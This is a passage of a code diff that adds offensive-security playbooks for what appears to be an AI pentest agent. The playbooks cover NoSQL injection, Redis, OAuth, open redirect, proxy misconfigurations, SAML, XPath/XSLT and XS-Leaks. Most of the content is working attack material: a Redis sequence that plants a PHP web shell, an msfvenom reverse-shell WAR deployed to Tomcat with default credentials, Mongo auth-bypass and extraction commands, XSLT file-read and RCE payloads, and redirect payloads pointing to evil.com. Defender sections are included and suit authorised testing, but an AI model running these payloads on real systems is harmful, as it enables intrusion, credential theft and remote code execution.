+`$where` was deprecated in Mongo 4.4 — still appears in legacy.
+
+### Operator extraction (blind)
+```bash
+# Burp Intruder w/ payload list
+for char in {a..z}; do
+  curl -s -X POST $TARGET/login \
+    -d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
+    | grep -q "success" && echo "char: $char"
+done
+```
+
+## 2. CouchDB
+```bash
+# Admin party (no auth required)
+curl http://target:5984/_all_dbs
+curl http://target:5984/_users/_all_docs
+# Then read/modify any document
+```
+
+## 3. Firebase Realtime Database
+```bash
+# Public-read databases (most common misconfig)
+curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
+# Returns entire DB if rules are "true"
+```
+
+## 4. Redis
+```bash
+# Unauth Redis (still common on internal nets, occasionally exposed)
+redis-cli -h target -p 6379 INFO
+# Module loading attack if running as root + module dir writable
+redis-cli -h target FLUSHALL
+redis-cli -h target SET dir /var/www/html
+redis-cli -h target SET dbfilename shell.php
+redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
+redis-cli -h target SAVE
+```
+
+## 5. Tools
+
+- **NoSQLMap** — automated mongo injection (`nosqlmap.py`)
+- **mongoaudit** — config scanner
+- Burp Intruder w/ payloads/NoSQL Injection/ as wordlist
+- **fuzzdb** — has NoSQL payload variants
+
+## 6. PoC
+
+```bash
+# Mongo auth bypass via curl
+curl -s -X POST $TARGET/api/login \
+  -H "Content-Type: application/json" \
+  -d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
+  | jq
+
+# If logged-in-as-admin → critical
+```
+
+## 7. Severity
+
+| Bug | Severity |
+|---|---|
+| Auth bypass via `$ne` | Critical 9.8 |
+| Blind char extraction of all user data | Critical 9.0 |
+| `$where` JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 |
+| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
+| Unauth Redis on internal net | High 7-8 |
+
+## 8. Defender
+
+```javascript
+// Sanitize/typecheck before query
+if (typeof req.body.user !== 'string') return res.status(400).send();
+if (typeof req.body.pass !== 'string') return res.status(400).send();
+
+// Or use parameterized queries / Mongo ODM (Mongoose schemas)
+User.findOne({user: req.body.user}).select('+password');
+
+// Disable $where globally
+mongoose.set('strictQuery', true);
+```
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/NoSQL Injection/`
+- SQLi (different attack class, similar mindset): `skills/exploit/web/sqli.md`

--- a/skills/exploit/web/oauth/SKILL.md
+++ b/skills/exploit/web/oauth/SKILL.md
@@ -1,0 +1,167 @@
+---
+name: oauth
+description: OAuth 2.0 / OIDC attacks — redirect_uri bypass, state CSRF, code leak via Referer, response_type confusion, PKCE downgrade, scope creep, ATO chains.
+when_to_use: "oauth oidc authorization_code redirect_uri client_id state pkce"
+mitre_attack: T1528, T1212
+metadata:
+  subdomain: authentication
+  upstream_ref: skills/_corpus/payloads/OAuth Misconfiguration/
+---
+
+# OAuth / OIDC Attack Playbook
+
+OAuth bugs are **the single highest-paying ATO vector** in modern bug
+bounty. Every B2B SaaS has an OAuth surface; many implement it wrong.
+
+## 1. Map the flow
+```bash
+# Discovery
+curl -s https://target/.well-known/openid-configuration | jq
+
+# Key endpoints to identify:
+# - /authorize  (where redirect_uri/client_id/scope arrive)
+# - /token      (where code exchanges for tokens)
+# - /userinfo   (claims about user)
+# - /jwks.json  (signing keys, see jwt/SKILL.md)
+# - /revoke     (sometimes overpermissive)
+```
+
+Capture a normal flow in Burp. Note: `client_id`, `redirect_uri`, `state`,
+`scope`, `response_type`, `code_challenge` (PKCE).
+
+## 2. Attack surface
+
+### 2.1 redirect_uri bypass
+The #1 OAuth bug class. Server's allowlist regex is too loose:
+
+| Bypass | Example |
+|---|---|
+| Path append | `https://target.com/callback/../../evil` |
+| Subdomain wildcard | `https://target.com.evil.com/cb` (server matches `*.target.com`) |
+| Userinfo trick | `https://target.com@evil.com/cb` |
+| Path-traversal in fragment | `https://target.com/cb#@evil.com` |
+| Open-redirect chain | `redirect_uri=https://target.com/known-redirect?to=evil.com` |
+| Localhost / loopback | `redirect_uri=http://localhost:1337` (often allowlisted) |
+| `data:` URI | `redirect_uri=data:text/html,<script>...` (rare but devastating) |
+| Mixed-protocol | `http://` accepted where `https://` required |
+| URL-encoded slash | `https://target.com%2Fcallback%2F@evil.com` |
+| Different fragment behavior | `redirect_uri=https://evil.com#https://target.com/cb` |
+
+Test ALL of these. `paramspider` + Burp Intruder w/ payload list = systematic.
+
+### 2.2 State parameter missing / weak (CSRF)
+`state` should bind the auth request to the user's session. Missing or
+predictable state → attacker initiates OAuth in own browser, sends victim
+the URL, victim clicks → attacker's account now linked to victim's identity.
+
+```
+GET /authorize?response_type=code
+    &client_id=...
+    &redirect_uri=https://target.com/cb
+    &state=                          ← empty or predictable
+```
+
+### 2.3 PKCE downgrade
+Public clients (mobile, SPA) SHOULD use PKCE. If server accepts
+`code_verifier` omission for a flow that should require it:
+```
+POST /token
+client_id=mobile-app
+code=<stolen_code>
+# Note: no code_verifier sent
+```
+Some servers fall back to non-PKCE flow → stolen code exchanges fine.
+
+### 2.4 Code reuse / replay
+Some servers don't invalidate codes after first exchange. Capture the
+code (via referer leak, IDOR, log scrape) → exchange in attacker's
+session for victim's tokens.
+
+### 2.5 Referer leak of `code`
+Some apps render auth-callback as a regular page that fetches resources
+from third-party CDNs. The full URL (including `?code=...`) is sent in
+`Referer` header to those CDNs. Attacker who owns / can compromise a
+CDN link extracts the code.
+
+Test: visit the callback URL, observe `Referer` to all third-party hosts.
+
+### 2.6 Scope creep / mass-assignment in token request
+```
+POST /token
+grant_type=authorization_code
+code=...
+scope=read write admin             ← inject elevated scope
+```
+Some servers honor a `scope` parameter at token-exchange time and don't
+re-validate against original `/authorize` scope.
+
+### 2.7 response_type confusion
+The hybrid flow (`response_type=code id_token`) may behave differently:
+- Server returns id_token in URL fragment (visible client-side)
+- Then code exchange for access_token
+- Sometimes the id_token validation is weak/skipped on response_type variations
+
+### 2.8 client_id confusion
+Some servers trust `client_id` as the only identifier. If two clients
+share a redirect_uri pattern, you can re-use one's code as another:
+```
+client_id=trusted-internal-app
+redirect_uri=https://attacker.com/cb (also allowlisted for trusted app!)
+```
+
+### 2.9 OAuth → Account Takeover chain
+The classic ATO via OAuth:
+1. Victim signs in to target via OAuth (Google/Microsoft)
+2. Attacker finds open-redirect or XSS on target
+3. Attacker crafts OAuth init URL w/ redirect_uri pointing to attacker via open-redirect
+4. Victim clicks → server issues code → redirected to attacker's host w/ code in URL
+5. Attacker exchanges code for victim's tokens → full ATO
+
+### 2.10 Account-linking vulnerabilities
+"Sign in with Google" can link a NEW Google account to an EXISTING email-password account if the server matches solely by email. Attacker registers `victim@target-mail.com` (a typosquat or sub-add), starts OAuth, links to victim's existing account.
+
+## 3. Tools
+- `oauthtoolkit` — Tom Hudson's automation
+- Burp Pro OAuth flow scanner
+- `oauth2-test` Python lib for fuzz
+- ZAP Scripting (OAuth modules)
+- Manual w/ Repeater (most flaws need careful semantic work)
+
+## 4. PoC pattern
+1. Capture normal flow
+2. For each parameter (redirect_uri, state, scope, response_type, client_id, code_challenge), fuzz w/ Burp Intruder using the bypass list above
+3. On any deviation (302 to attacker host, token issued with elevated scope, etc) — capture as evidence
+4. Construct ATO chain: combine OAuth bug w/ open-redirect OR XSS for victim-clicks-link → tokens delivered to attacker
+
+## 5. Severity calibration
+
+| Bug | Typical |
+|---|---|
+| redirect_uri bypass on real client → code to attacker | Critical 9.8 (full ATO) |
+| Missing state on social-login | High 8.0 (one-click account hijack) |
+| Scope creep accepted | High 8.0 |
+| PKCE downgrade on public client | High 7.5 |
+| Code reuse accepted | High 8.0 |
+| Open-redirect chain extension only | Medium 6.0 |
+| Account-linking via email | High-Critical depending on impact |
+
+## 6. Defender remediation
+
+- Exact-match `redirect_uri` (case-sensitive, full URL, no path manipulation)
+- Mandatory non-empty unpredictable `state` bound to session
+- Invalidate codes on first use; short TTL (≤ 60s)
+- PKCE required for ALL public clients
+- Server-side scope validation: reject `scope` in token request that exceeds the original /authorize scope
+- Never link OAuth identity to existing account by email alone — require explicit user confirmation
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/OAuth Misconfiguration/`
+- ATO chaining: `skills/exploit/web/ato-methodology/SKILL.md`
+- Open-redirect chains: `skills/exploit/web/open-redirect/SKILL.md`
+
+## Known exemplars
+- Microsoft 2020: $50k OAuth ATO chain on Teams via redirect_uri
+- Slack 2017: $4-8k bounties on multiple redirect_uri bypasses
+- Github 2019: OAuth scope creep bug for $5k
+- Frans Rosén's writeup on OAuth bugs (one of the best resources)
+- Hackerone disclosure #341876 — Asana account-linking via email

--- a/skills/exploit/web/open-redirect/SKILL.md
+++ b/skills/exploit/web/open-redirect/SKILL.md
@@ -1,0 +1,115 @@
+---
+name: open-redirect
+description: Open redirect + tabnabbing — URL filter bypass, OAuth chain extension, phishing infrastructure-free, SSRF chain.
+when_to_use: "open redirect url next return continue redirect_uri tabnabbing"
+mitre_attack: T1204
+metadata:
+  subdomain: redirect
+  upstream_ref: skills/_corpus/payloads/Open Redirect/
+---
+
+# Open Redirect Playbook
+
+Standalone open redirect = Low/Informational by itself.
+**Chained**: critical (OAuth ATO, SSRF, phishing trust transfer).
+
+## 1. Common parameters
+```
+?next=...  ?return=...  ?continue=...  ?redirect=...  ?url=...  ?to=...
+?goto=...  ?destination=...  ?back=...  ?returnTo=...  ?callbackUrl=...
+?image_url=...  ?file=...  ?logout_redirect=...  ?success=...
+```
+
+Grep recon URLs / JS for these params.
+
+## 2. Bypass table
+
+| Technique | Payload |
+|---|---|
+| Direct | `https://evil.com` |
+| Protocol-relative | `//evil.com` |
+| Triple-slash | `///evil.com` |
+| Backslash | `\\evil.com` or `/\\evil.com` |
+| Encoded slash | `%2f%2fevil.com` |
+| Mixed encoded | `/%5cevil.com` |
+| Userinfo | `https://target.com@evil.com` |
+| Whitelist confusion | `https://target.com.evil.com` (subdomain ends w/ allowed) |
+| Path-traversal in fragment | `target.com/?redirect=evil.com#@target.com` |
+| Data URI | `data:text/html,<script>location='https://evil.com'</script>` |
+| Javascript URI | `javascript:alert(1)` (for XSS upgrade) |
+| CRLF injection | `redirect=evil.com%0d%0aSet-Cookie:...` |
+| Punycode | `https://xn--80ak6aa92e.com` (looks like `apple.com`) |
+| Mixed-case scheme | `HTTPS://evil.com` |
+| Whitespace prefix | `%09//evil.com`, `%20//evil.com` |
+| URL-encoded null | `evil.com%00.target.com` |
+| Multiple slashes | `//////evil.com` |
+
+## 3. Chain patterns
+
+### 3.1 OAuth redirect_uri extension
+Target's OAuth flow validates redirect_uri must be on `*.target.com`.
+You have open-redirect at `target.com/redir?to=...`. Attacker:
+```
+redirect_uri=https://target.com/redir?to=https://evil.com/cb
+```
+OAuth server allows the literal target.com host; victim browser
+follows the 302 → evil.com → code in URL.
+
+### 3.2 SSRF extension
+Target's SSRF protection denies external hosts via DNS pinning. But
+fetches the URL via redirect. Server-side fetcher visits target.com (allowed),
+follows 302 to internal IP (no DNS re-resolution).
+
+### 3.3 Phishing
+Send phishing email from attacker domain → click → lands on
+`target.com/login?next=https://evil-attacker.com/fake-login`. After
+"login" page redirects to attacker — but URL bar shows `target.com` for
+the first second, building trust.
+
+### 3.4 Tabnabbing
+`window.open(URL)` w/o `noopener,noreferrer` → opened tab can navigate
+the OPENER (original target tab) to phishing page. Combined w/ open
+redirect = full visual takeover of the original target.
+
+## 4. Tools
+- **OpenRedireX** — fuzz w/ massive payload list
+- Burp Intruder w/ payloads from `_corpus/payloads/Open Redirect/`
+- `gf` (Tomnomnom) patterns to extract redirect params from URLs
+
+## 5. PoC
+```bash
+curl -s -I "$TARGET/redir?next=https://evil.com" | grep -i Location
+# Look for: Location: https://evil.com  → confirmed open redirect
+```
+
+## 6. Severity
+
+| Scenario | Typical |
+|---|---|
+| Standalone open redirect, no chain | Low 3-4 / Informational |
+| Chained w/ OAuth → ATO | Critical 9.0 |
+| Chained w/ SSRF bypass → metadata extraction | Critical 9.0 |
+| Tabnabbing on high-trust target | Medium 5-6 |
+| Phishing-only (no ATO chain) | Low-Medium |
+
+## 7. Defender
+```python
+from urllib.parse import urlparse
+
+def safe_redirect(url, allowed_hosts={'target.com'}):
+    p = urlparse(url)
+    if not p.netloc:        # relative path only
+        return url if url.startswith('/') and not url.startswith('//') else '/'
+    if p.netloc in allowed_hosts:
+        return url
+    return '/'
+
+# At redirect site:
+response.headers['Referrer-Policy'] = 'strict-origin'
+target_link.rel = 'noopener noreferrer'   # in HTML <a>
+```
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/Open Redirect/`
+- OAuth chain extension: `skills/exploit/web/oauth/SKILL.md`
+- SSRF chain extension: `skills/exploit/web/ssrf.md`

--- a/skills/exploit/web/proxy-misconfig/SKILL.md
+++ b/skills/exploit/web/proxy-misconfig/SKILL.md
@@ -1,0 +1,160 @@
+---
+name: proxy-misconfig
+description: Reverse proxy misconfigurations — nginx alias traversal, Apache mod_rewrite SSRF, Spring Boot Actuator exposure, Tomcat manager, IIS short-name disclosure.
+when_to_use: "reverse proxy nginx apache iis tomcat spring actuator alias rewrite"
+mitre_attack: T1190
+metadata:
+  subdomain: infrastructure
+  upstream_ref: skills/_corpus/payloads/Reverse Proxy Misconfigurations/ + Insecure Management Interface/
+---
+
+# Reverse Proxy Misconfigurations
+
+## 1. Nginx alias traversal
+Nginx `alias` directive (vs `root`) is dangerous when URL pattern is
+prefix-based but alias is a directory:
+```nginx
+location /static {
+    alias /var/www/static/;       # trailing slash CRITICAL
+}
+# But buggy:
+location /static {
+    alias /var/www/static;        # NO trailing slash → path traversal possible
+}
+```
+
+Bypass:
+```
+GET /static../etc/passwd  → resolves to /var/www/static../etc/passwd → /var/www/etc/passwd (if exists)
+GET /static../  → directory listing if autoindex on
+```
+
+## 2. Apache mod_rewrite SSRF
+```apache
+RewriteRule ^/proxy/(.*) http://$1 [P]
+# Attacker:
+GET /proxy/internal-host.local/admin → server makes outbound to internal
+GET /proxy/169.254.169.254/latest/meta-data → AWS metadata SSRF
+```
+
+## 3. Spring Boot Actuator exposure
+```bash
+# Common endpoints if exposed
+curl $TARGET/actuator
+curl $TARGET/actuator/env       # all env vars including secrets
+curl $TARGET/actuator/heapdump  # full memory dump (often contains tokens/passwords)
+curl $TARGET/actuator/mappings  # all routes
+curl $TARGET/actuator/loggers   # logging config
+curl $TARGET/actuator/jolokia/  # JMX bridge → RCE in many configs
+
+# Pre-2.x style
+curl $TARGET/env
+curl $TARGET/dump
+curl $TARGET/trace
+curl $TARGET/heapdump
+```
+
+## 4. Tomcat Manager
+```bash
+curl -u tomcat:tomcat $TARGET/manager/text/list
+# Default creds:
+# tomcat:tomcat, admin:admin, admin:tomcat, role1:role1
+# tomcat:s3cret, manager:manager
+
+# If logged in → upload WAR for RCE
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war
+curl -u admin:admin -T shell.war "$TARGET/manager/text/deploy?path=/shell"
+curl "$TARGET/shell/"   # triggers shell
+```
+
+## 5. IIS short-name disclosure (8.3 names)
+```bash
+# Probe via specific URL pattern + difference in error
+curl -s -o /dev/null -w "%{http_code}\n" "$TARGET/A*~1*/"
+# 400 if exists, 404 if not — leaks first chars of files/dirs
+# Tool: shortscan, IIS_shortname_Scanner
+```
+
+## 6. Nginx merge_slashes off + URL encoded
+```bash
+GET /api//../../admin   # if merge_slashes off, internal route mapping bypasses auth
+GET /api/%2e%2e/admin   # URL-encoded traversal
+```
+
+## 7. Header injection via X-Forwarded-*
+Some apps trust `X-Forwarded-For`/`X-Real-IP` from reverse proxy and use
+it for auth (admin from internal IP). If proxy doesn't strip incoming headers:
+```bash
+curl -H "X-Forwarded-For: 127.0.0.1" $TARGET/admin
+curl -H "X-Real-IP: 10.0.0.1" $TARGET/admin
+curl -H "X-Original-Forwarded-For: 192.168.1.1" $TARGET/admin
+```
+
+## 8. WebSocket Origin bypass via proxy
+Proxy doesn't validate WebSocket Origin → attacker-origin can connect.
+```bash
+wscat -c "wss://target.com/ws" -H "Origin: https://evil.com"
+```
+
+## 9. HTTP/2 specific attacks
+Some proxies have h2 → h1 downgrade bugs (smuggling). See
+`skills/exploit/web/smuggling.md`.
+
+## 10. Tools
+- **Nuclei templates** for actuator/manager/admin discovery
+- **JFrog actuator scanner**
+- **shortscan** for IIS 8.3
+- **smuggler.py** for h2 → h1
+- **trustedheaders** for header injection
+
+## PoC pattern
+```bash
+# Spring Actuator
+curl -s "$TARGET/actuator/env" | jq '.propertySources[] | .properties' | head
+# Heap dump if accessible:
+curl -s -o /tmp/heap.bin "$TARGET/actuator/heapdump"
+strings /tmp/heap.bin | grep -iE 'password|token|secret|aws_access' | head
+```
+
+## Severity
+
+| Bug | Severity |
+|---|---|
+| Actuator `/env` w/ secrets visible | Critical 9.8 |
+| Tomcat manager default-creds | Critical 9.8 (RCE) |
+| Nginx alias → /etc/passwd | High 8.0 |
+| Apache mod_rewrite SSRF → metadata | Critical 9.0 |
+| IIS short-name disclosure | Medium 4-5 |
+| X-Forwarded-For trust → admin | Critical 9.8 |
+
+## Defender
+```nginx
+# nginx — always trailing slash on alias
+location /static/ {
+    alias /var/www/static/;
+}
+
+# Strip X-Forwarded-* from client
+real_ip_header X-Forwarded-For;
+set_real_ip_from 10.0.0.0/8;     # only trust internal
+real_ip_recursive on;
+```
+
+Spring Boot:
+```yaml
+management:
+  endpoints:
+    web:
+      exposure:
+        include: health, info         # never *
+  endpoint:
+    env:
+      enabled: false
+    heapdump:
+      enabled: false
+```
+
+## Cross-references
+- Upstream: `skills/_corpus/payloads/Reverse Proxy Misconfigurations/` + `Insecure Management Interface/`
+- SSRF chain: `skills/exploit/web/ssrf.md`
+- HTTP smuggling: `skills/exploit/web/smuggling.md`

--- a/skills/exploit/web/saml/SKILL.md
+++ b/skills/exploit/web/saml/SKILL.md
@@ -1,0 +1,145 @@
+---
+name: saml
+description: SAML 2.0 attacks — XSW (XML Signature Wrapping) variants 1-8, comment injection, signature stripping, assertion forgery, IdP metadata abuse.
+when_to_use: "saml sso identity provider assertion signature xsw signedinfo"
+mitre_attack: T1606.002
+metadata:
+  subdomain: authentication
+  upstream_ref: skills/_corpus/payloads/SAML Injection/
+---
+
+# SAML Attack Playbook
+
+SAML is XML-based SSO used heavily in enterprise. Signatures protect
+assertions but XML's structural flexibility creates many opportunities
+to confuse signature validators.
+
+## 1. Capture the flow
+```bash
+# Identify SAML in recon — look for:
+# - /SAML/login, /sso/saml, /saml2/login
+# - Form param "SAMLRequest" or "SAMLResponse" (base64 + deflate)
+# - SP metadata: /SAML/metadata, /sp/metadata.xml
+# - IdP metadata: /idp/metadata.xml
+
+# Decode a SAML message in Burp via the SAML Raider plugin
+# Or manually
+echo "$SAMLResponse_base64" | base64 -d | xmllint --format -
+```
+
+## 2. XML Signature Wrapping (XSW) attacks
+
+The classic SAML bug class. 8 canonical variants. SAML Raider implements
+all of them.
+
+### XSW1: Wrap signed Assertion inside Response, add evil assertion
+```xml
+<Response>
+  <ds:Signature>...</ds:Signature>  <!-- signs the inner Assertion -->
+  <Assertion id="evil">
+    <Subject>attacker</Subject>
+    <AttributeStatement>...</AttributeStatement>
+  </Assertion>
+  <!-- original signed assertion moved into a deeper child or as sibling of evil -->
+  <Assertion id="orig">
+    <Subject>victim</Subject>
+    ...
+  </Assertion>
+</Response>
+```
+Parser-checks-signature on `orig` (still valid). App-reads-claims from
+`evil` (first assertion). Bypass complete.
+
+### XSW2-8
+Vary which element is signed, what gets added where, what gets renamed.
+Run all 8 via SAML Raider's automated XSW tester.
+
+## 3. Comment injection
+SAML libraries that strip XML comments BEFORE signature validation but
+the application reads the un-stripped version (or vice versa):
+```xml
+<Subject>victim@target.com<!-- foo -->.evil.com</Subject>
+```
+Some parsers see `victim@target.com`; others see `victim@target.com.evil.com`.
+
+Famous: Cisco DUO + others in 2018 (CVE-2018-0489).
+
+## 4. Signature stripping
+Just delete the `<ds:Signature>` element. Some servers fail to enforce
+signature presence.
+
+## 5. Self-signed assertion (when allowed by misconfig)
+Some SPs accept assertions from any IdP listed in their trust store. If
+the trust store is overly broad, attacker stands up own IdP, generates
+own cert, IdP signs assertion claiming victim identity.
+
+## 6. Bypass via `SAMLResponse` to `SAMLRequest` confusion
+Both are base64'd + deflated XML. Some endpoints handle either.
+Sending an unsigned SAMLResponse when the endpoint expects a
+SAMLRequest may bypass auth.
+
+## 7. Attribute injection via metadata
+If SP fetches IdP metadata at runtime from a URL (not pinned), attacker
+who can poison/spoof that URL injects malicious metadata claiming
+attacker's IdP signs as victim's IdP.
+
+## 8. Replay
+Many SAML implementations don't track assertion IDs. Capture a victim's
+SAML response, replay it later. Mitigation: assertions have `NotOnOrAfter`
++ unique `ID`; SPs should track recently-used IDs in a cache.
+
+## 9. KeyInfo / certificate confusion
+`<ds:KeyInfo>` can carry the cert inline. Attacker:
+- Sends own cert in KeyInfo
+- Signs assertion w/ corresponding private key
+- Server validates against the cert in KeyInfo (instead of its trust store)
+
+## 10. Tools
+
+- **SAML Raider** (Burp plugin) — XSW1-8 automation, signature operations,
+  message editing. Essential.
+- **`samltool.com`** — XML pretty-print + base64 decode
+- **`samlxss`** — quick XSS payload tester in SAML attributes
+- **Python `saml2`** — manual crafting via lxml
+
+## 11. PoC pattern
+
+1. Capture victim's SAMLResponse in Burp
+2. Decode, identify Subject + AttributeStatement
+3. Launch SAML Raider → "XSW Test" → cycle through all 8 variants, observe response
+4. Any variant that returns logged-in-as-target = bug
+5. If XSW fails, try comment injection: inject `<!-- foo -->` in claim values
+6. If still fails, try signature stripping (delete `<ds:Signature>`)
+7. Document the modified SAMLResponse + the resulting authenticated session as PoC
+
+## 12. Severity calibration
+
+| Bug | Typical |
+|---|---|
+| XSW variant accepted → arbitrary user impersonation | Critical 9.8 (most enterprise SSO bounty) |
+| Comment injection accepted | Critical 9.8 |
+| Signature stripping accepted | Critical 9.8 |
+| KeyInfo cert trust | Critical 9.8 |
+| Replay window > 5 min | High 7-8 |
+| Self-IdP misconfig | Critical 9.8 |
+
+## 13. Defender remediation
+
+- Use a battle-tested library (PySAML2, opensaml-cpp, OneLogin's SAML libs)
+- Pin trusted IdPs by cert fingerprint, not URL
+- Cache assertion IDs and reject replays
+- Validate signature BEFORE comment-stripping (or after, but consistently)
+- Reject responses w/o `<ds:Signature>`
+- Never trust `<ds:KeyInfo>` content — match against pinned trust store
+
+## Cross-references
+
+- Upstream catalog: `skills/_corpus/payloads/SAML Injection/`
+- Web2 vuln class details (XSW1-8 mechanics): `skills/_corpus/payloads/SAML Injection/Readme.md`
+
+## Known exemplars
+
+- CVE-2018-0489 (Cisco DUO comment injection)
+- Multiple HackerOne $10-30k bounties for XSW in enterprise SSO
+- "Duo's SAML Vulnerability" writeup (Duo Security blog)
+- Onelogin / Okta historical issues — most modern enterprise IdPs have been hit at least once

--- a/skills/exploit/web/xpath-xslt/SKILL.md
+++ b/skills/exploit/web/xpath-xslt/SKILL.md
@@ -1,0 +1,92 @@
+---
+name: xpath-xslt
+description: XPath + XSLT injection — query manipulation in XML data stores, server-side XSLT RCE via document() / EXSLT extensions.
+when_to_use: "xpath xslt xml injection xpath_string xsl:value-of document()"
+mitre_attack: T1190
+metadata:
+  subdomain: injection
+  upstream_ref: skills/_corpus/payloads/XPATH Injection/
+---
+
+# XPath + XSLT Injection
+
+## XPath Injection
+XPath = XML query language. User input concatenated into a query string = injection. Same shape as SQL injection but on XML data.
+
+### Auth bypass
+```python
+# Vulnerable
+query = f"//user[username='{user}' and password='{pw}']"
+
+# Payload
+user = "' or '1'='1"  → //user[username='' or '1'='1' and password='']
+user = "admin'] | //user[*='"  → returns all users
+```
+
+### Blind extraction
+```bash
+# Boolean
+//user[username='admin' and substring(password, 1, 1)='a']
+# Time-based — XPath has no sleep, but some impls support extensions
+```
+
+## XSLT Injection
+Worse than XPath: XSLT is Turing-complete and many engines support
+file I/O and RCE.
+
+### document() function — file read
+```xml
+<xsl:value-of select="document('file:///etc/passwd')"/>
+<xsl:value-of select="document('http://evil.com/x')"/>  ← SSRF
+```
+
+### EXSLT — RCE on some engines
+```xml
+<!-- Saxon -->
+<xsl:value-of select="saxon:evaluate('1+1')"/>
+
+<!-- libxslt w/ Xalan-Java extension -->
+<xsl:value-of select='rt:exec(rt:getRuntime(), "id")'/>
+```
+
+### Reflected XSS via XSLT
+```xml
+<xsl:value-of select="//input" disable-output-escaping="yes"/>
+<!-- attacker-controlled XML → unescaped output → XSS -->
+```
+
+## Detection
+- Endpoint accepts XML w/ XSLT transform (XML report builders, SOAP responses w/ XSLT)
+- Apps using XPath: legacy intranets, file-based config querying, XML feeds
+
+## PoC
+```bash
+# XPath
+curl -X POST "$TARGET/login" -d "user=' or '1'='1&pass=anything"
+
+# XSLT file read
+curl -X POST "$TARGET/transform" --data-binary @- <<'EOF'
+<?xml version="1.0"?>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/">
+    <xsl:value-of select="document('file:///etc/passwd')"/>
+  </xsl:template>
+</xsl:stylesheet>
+EOF
+```
+
+## Severity
+- XPath auth bypass: Critical 9.8
+- XSLT file read: Critical 9.0
+- XSLT RCE: Critical 10.0
+- Blind XPath extraction: High 7-8
+
+## Defender
+- Use parameterized XPath via libraries (`lxml.etree.XPath(expr)` w/ variable bindings)
+- Disable XSLT extensions by default
+- Use `XSLT_SECPREFS_NO_NETWORK | XSLT_SECPREFS_NO_FILE` (libxslt)
+- Sanitize / strict-validate XML input schema
+
+## Cross-references
+- Upstream: `skills/_corpus/payloads/XPATH Injection/` + `XSLT Injection/`
+- XXE (different XML class): `skills/exploit/web/xxe.md`

--- a/skills/exploit/web/xs-leaks/SKILL.md
+++ b/skills/exploit/web/xs-leaks/SKILL.md
@@ -1,0 +1,118 @@
+---
+name: xs-leaks
+description: XS-Leaks — cross-site information leaks via timing, frame counting, navigation, error oracles. Side-channel attacks against same-origin authenticated state.
+when_to_use: "xs-leak xsleak frame count navigation timing oracle cross-origin"
+mitre_attack: T1559
+metadata:
+  subdomain: client-side
+  upstream_ref: skills/_corpus/payloads/XS-Leak/
+---
+
+# XS-Leaks (Cross-Site Leaks)
+
+XS-Leaks abuse browser primitives that leak information ACROSS origins.
+Attacker page can observe whether a cross-origin GET returned different
+content based on victim's authenticated state. Smaller than full
+cross-origin read (which is blocked), but enough to enumerate identifiers,
+detect membership, learn search-result presence.
+
+## 1. Categories
+
+### 1.1 Timing oracles
+Cross-origin fetch / image load timing varies by server response size.
+Attacker measures load time → infers content.
+```javascript
+const start = performance.now();
+const img = new Image();
+img.onerror = () => console.log(performance.now() - start);
+img.src = 'https://target.com/api/users/me/notifications';
+```
+
+### 1.2 Frame counting (`window.frames.length`)
+Some pages embed N iframes when authenticated and 0 when not. Attacker
+iframes target page and reads `iframe.contentWindow.frames.length`.
+
+### 1.3 Window name / postMessage leak
+`iframe.contentWindow.name` is preserved across navigation. Some pages
+set it w/ user-identifying data.
+
+### 1.4 Error-event oracle
+`<img src=target.com/api/user/{id}/data>` triggers different `onerror`
+behavior based on response code (403 vs 404 vs 200 w/ image content-type).
+
+### 1.5 CSS injection style oracle
+`<link rel=stylesheet href=target.com/page>` — different applied styles
+leak state via getComputedStyle of attacker page.
+
+### 1.6 Search result presence
+Many search endpoints return cached/non-cached headers indicating hits.
+Attacker measures cache hit vs miss timing for guessed search terms.
+
+### 1.7 ID guessability (XS-Search)
+```javascript
+for (const guessed_id of guessable_set) {
+    const url = `https://target.com/api/user/${guessed_id}`;
+    // measure timing or frame-count differential
+}
+```
+
+## 2. xsleaks.dev — canonical reference
+
+Full taxonomy + browser-version compatibility matrix:
+https://xsleaks.dev/
+
+Decepticon agents should consult this for current technique viability —
+browser mitigations evolve fast (COOP, COEP, Cross-Origin-Opener-Policy).
+
+## 3. Detection
+
+```javascript
+// Frame count
+const f = document.createElement('iframe');
+f.src = 'https://target.com/dashboard';   // attacker hosts this in own page
+document.body.appendChild(f);
+f.onload = () => {
+    console.log('frames:', f.contentWindow.frames.length);
+};
+
+// Timing
+async function timeFetch(url) {
+    const t = performance.now();
+    try { await fetch(url, {mode:'no-cors', credentials:'include'}); } catch {}
+    return performance.now() - t;
+}
+```
+
+## 4. PoC framing
+
+XS-Leak PoCs require:
+- Attacker host (your own controlled domain)
+- Victim browser with authenticated session to target
+- Visual demonstration of leaked info (e.g. infer victim's email, search history, friend list)
+
+Document the attack page, record video of victim browser visiting it →
+inferred information displayed.
+
+## 5. Severity
+
+| Bug | Severity |
+|---|---|
+| XS-Search enumerating victim's private documents | High 7-8 |
+| Frame-count revealing logged-in state | Medium 5-6 |
+| Timing oracle inferring victim email / ID | High 7-8 |
+| Window.name leaking session info | High 7-8 |
+| Cross-origin error-event leaking which users exist | Medium 4-5 |
+
+## 6. Defender
+
+- Set `Cross-Origin-Opener-Policy: same-origin`
+- Set `Cross-Origin-Embedder-Policy: require-corp`
+- Set `Cross-Origin-Resource-Policy: same-origin`
+- Disable iframe embedding for sensitive pages: `X-Frame-Options: DENY` or `frame-ancestors 'none'` in CSP
+- Constant-time responses for sensitive endpoints (esp. when state-dependent)
+- `Vary: Cookie` + careful caching
+
+## Cross-references
+- Upstream: `skills/_corpus/payloads/XS-Leak/`
+- xsleaks.dev — primary reference
+- DOM clobbering overlap (different class, same client-side mindset): `skills/exploit/web/dom-clobbering/SKILL.md`


### PR DESCRIPTION
## Summary

